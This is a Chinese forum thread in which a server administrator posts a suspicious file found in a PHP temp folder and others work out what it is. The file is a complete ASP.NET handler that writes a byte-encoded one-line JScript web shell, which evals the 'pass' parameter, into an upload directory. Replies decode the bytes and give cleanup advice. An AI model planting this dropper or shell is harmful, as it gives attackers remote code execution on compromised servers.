PHP 临时文件夹出现这样的文件是怎么来的，想干啥呢？

zhansh

<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;


public class Handler : IHttpHandler
{
    public bool IsReusable
    {
        get
        {
            return false;
        }
    }
    public void ProcessRequest(HttpContext context)
    {
        byte[] b={0x3C, 0x25, 0x40, 0x20, 0x50, 0x61, 0x67, 0x65, 0x20, 0x4C, 0x61, 0x6E, 0x67, 0x75, 0x61, 0x67, 0x65, 0x3D, 0x22, 0x4A, 0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x22, 0x25, 0x3E, 0x3C, 0x25, 0x65, 0x76, 0x61, 0x6C, 0x28, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x2E, 0x49, 0x74, 0x65, 0x6D, 0x5B, 0x22, 0x70, 0x61, 0x73, 0x73, 0x22, 0x5D, 0x2C, 0x22, 0x75, 0x6E, 0x73, 0x61, 0x66, 0x65, 0x22, 0x29, 0x3B, 0x25, 0x3E};
        try
        {
            File.WriteAllBytes(context.Server.MapPath("/e/upload/s1/article/file/")+"/ajlss.aspx",b);
            context.Response.Write("oooooooookkkkkkkkk");
        }
        catch(Exception ex)
        {
            context.Response.Write(ex.Message);
        }
        context.Response.End();
    }
}

zhansh

mwmbfh 发表于 2022-9-15 21:29
具体干什么的不太懂。
估计是被突破了。记得删除文件，然后看看PHP文件夹的权限。查看一下系统日志和文件 ...

感觉有点异常，但是不知道怎么传上来的，总是有很多类似的文件，所有者都是 IUSR

mwmbfh

具体干什么的不太懂。
估计是被突破了。记得删除文件，然后看看PHP文件夹的权限。查看一下系统日志和文件属性。
千万小心勒索病毒。重要文件赶快备份，然后最好把这个机器和其他终端设备做一个通信隔离。
安全第一啊。

zhansh

是不是存在 ASP 执行方面的漏洞呢？

wychashe

帝国系统？

好好学习多挣钱

那一段byte转换结果是
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
其他的我就不懂了

KSPprince

被挂马了，然后它再通过这个文件post下，就可以生成一个一句话木马文件

4899

好好学习多挣钱 发表于 2022-9-16 08:17
那一段byte转换结果是

其他的我就不懂了

一句话木马

ldwz

好好学习多挣钱 发表于 2022-9-16 08:17
那一段byte转换结果是

其他的我就不懂了

PHP木马~~~悲剧了~

Yo丨Se7ven

执行php文件，向目录/e/upload/s1/article/file/写入aspx文件，文件内容就是那段加密的一句话木马，如果该目录可以执行aspx文件，你服务器就危险了，aspx提权很容易拿到服务器root。